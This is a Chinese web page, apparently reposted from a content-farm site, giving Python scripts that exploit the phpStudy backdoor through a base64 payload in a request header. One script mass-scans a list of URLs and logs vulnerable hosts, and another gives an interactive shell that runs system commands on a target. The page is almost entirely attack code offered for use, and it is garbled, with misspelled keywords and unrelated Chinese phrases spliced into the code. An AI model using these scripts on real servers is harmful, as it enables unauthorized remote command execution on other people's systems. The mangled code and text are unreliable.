首页 > 作文

phpstudy后门rce批量利用脚本的实现

更新时间:2023-04-08 04:22:20 阅读: 评论:0

写两个一个批量检测的 一个交互式shell的

暂时py 图形化的qt写出来..有点问题

后门包 :

get / http/1.1
host: 127.0.0.1
ur-agent: mozilla/5.0 (windows nt 10.0; win64; x64; rv:55.0) gecko/20100101 firefox/55.0
accept: text/html,application/xhtml+xml,application/xml;录取通知书什么时候发q=0.9,*/*;q=0.8
accept-language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
connection: clo
accept-chart: zwnobybzexn0zw0oim5ldcb1c2vyiik7
accept-encoding: gzip,deflate
upgrade-incure-requests: 1

执行那段写shell即可

晚上抽点空简单写个发包的py:

#!/usr/bin/env python3#-*- encoding:utf-8 -*-# 卿 博客:https://www.cnblogs.com/-qing-/import ba64import requestsimport threadingimport queueprint("======phpstudy backdoor exploit============\n")print("===========by qing=================\n")print("=====blog:https://www.cnblogs.com/-qing-/==\n")paylo克服困难的英语作文ad = "echo \"qing\";"payload = ba64.b64encode(payload.encode('utf-8'))payload = str(payload, 'utf-8')headers = {  'upgrade-incure-requests': '1',  'ur-agent': 'mozilla/5.0 (windows nt 6.1; win64; x64) applewebkit/537.36 (kht赞美医生ml, like gecko) chrome/75.0.3770.100 safari/537.36',  'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',  'accept-language': 'zh-cn,zh;q=0.9',  'accept-chart': payload,  'accept-encoding': 'gzip,deflate',  'connection': 'clo英音和美音的区别',}def write_shell(url,headers):  try:    r = requests.get(url=url+'/index.php', headers=headers, verify=fal,timeout=30)    if "qing" in r.text:      print ('[ + ] backdoor successful: '+url+'===============[ + ]\n')      with open('success.txt','a') as f:          f.write(url+'\n')    el:      print ('[ - ] backdoor failed: '+url+'[ - ]\n')  except:    print ('[ - ] timeout: '+url+' [ - ]\n')url = "http://xxx"write_shell(url=url,headers=headers)

界面优化、改下多线程、批量读取文本文件后的代码:

#!/usr/bin/env python3#-*- encoding:utf-8 -*-# 卿 博客:https://www.cnblogs.com/-qing-/import ba64import requestsimport threadingimport threadpoolprint("======phpstudy backdoor exploit============\n")print("===========by qing=================\n")print("=====blog:https://www.cnblogs.com/-qing-/==\n")def write_shell(url):  payload = "echo \"qing\";"  payload = ba64.b64encode(payload.encode('utf-8个人自评'))  payload = str(payload, 'utf-8')  headers = {  'upgrade-incure-requests': '1',  'ur-agent': 'mozilla/5.0 (windows nt 6.1; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/75.0.3770.100 safari/537.36',  'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',  'accept-language': 'zh-cn,zh;q=0.9',  'accept-chart': payload,  'accept-encoding': 'gzip,deflate',  'connection': 'clo',}  try:    r = requests.get(url=url+'/index.php', headers=headers, verify=fal,timeout=30)    if "qing" in r.text:      print ('[ + ] backdoor successful: '+url+'===============[ + ]\n')      with open('success.txt','a') as f:          f.write(url+'\n')    el:      print ('[ - ] backdoor failed: '+url+'[ - ]\n')  except:    print ('[ - ] timeout: '+url+' [ - ]\n')# url = "http://xxx"# write_shell(url=url,headers=headers)def main():  with open('url.txt','r') as f:    lines = f.read().splitlines()    task_pool=threadpool.threadpool(5)    requests=threadpool.makerequests(write_shell,lines)  for req in requests:    task_pool.putrequest(req)    task_pool.wait() if __name__ == '__main__':  main()#线程队列部分# th=[]# th_num=10# for x in range(th_num):#     t=threading.thread(target=write_shell)#     th.append(t)# for x in range(th_num):#     th[x].start()# for x in range(th_num):#     th[x].join()

你也可以加上读取php文件的字典 这个简单没啥说的

下一个是交互式shell

#!/usr/bin/env python3#-*- encoding:utf-8 -*-# 卿 博客:https://www.cnblogs.com/-qing-/import ba64import requestsimport threadingimport threadpoolimport reprint("======phpstudy backdoor exploit---os-shell============\n")print("===========by qing=================\n")print("=====blog:https://www.cnblogs.com/-qing-/==\n")def os_shell(url,headers,payload):  try:    r = requests.get(url=url+'/phpinfo.php',headers=headers,verify=fal,timeout=10)    # print(r.text)    res = re.findall("qing(.*?)qing",r.text,re.s)    print("[ + ]===========the respon:==========[ + ]\n")    res = "".join(res)    print(res)  except:    print("[ - ]===========failed! timeout...==========[ - ]\n")def main():  url = input("input the url , example:\"http://127.0.0.1/\"\n")  payload = input("input the payload , default:echo system(\"whoami\");\n")  de_payload = "echo \"qing\";system(\"whoami\");echo \"qing\";"  if payload.strip() == '':    payload = de_payload  payload = "echo \"qing\";"+payload+"echo \"qing\";"  payload = ba64.b64encode(payload.encode('utf-8'))  payload = str(payload, 'utf-8')  headers = {  'upgrade-incure-requests': '1',  'ur-agent': 'mozilla/5.0 (windows nt 6.1; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/75.0.3770.100 safari/537.36',  'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',  'accept-language': 'zh-cn,zh;q=0.9',  'accept-chart': payload,  'accept-encoding': 'gzip,deflate',  'connection': 'clo',  }  os_shell(url=url,headers=headers,payload=payload)if __name__ == '__main__':  main()

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持www.887551.com。

本文发布于:2023-04-08 04:22:16,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/fanwen/zuowen/14a5419f14d19896d14d7169fd74ce8c.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:phpstudy后门rce批量利用脚本的实现.doc

本文 PDF 下载地址:phpstudy后门rce批量利用脚本的实现.pdf

标签:批量   博客   简单   什么时候
相关文章
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2022 Comsenz Inc.Powered by © 专利检索| 网站地图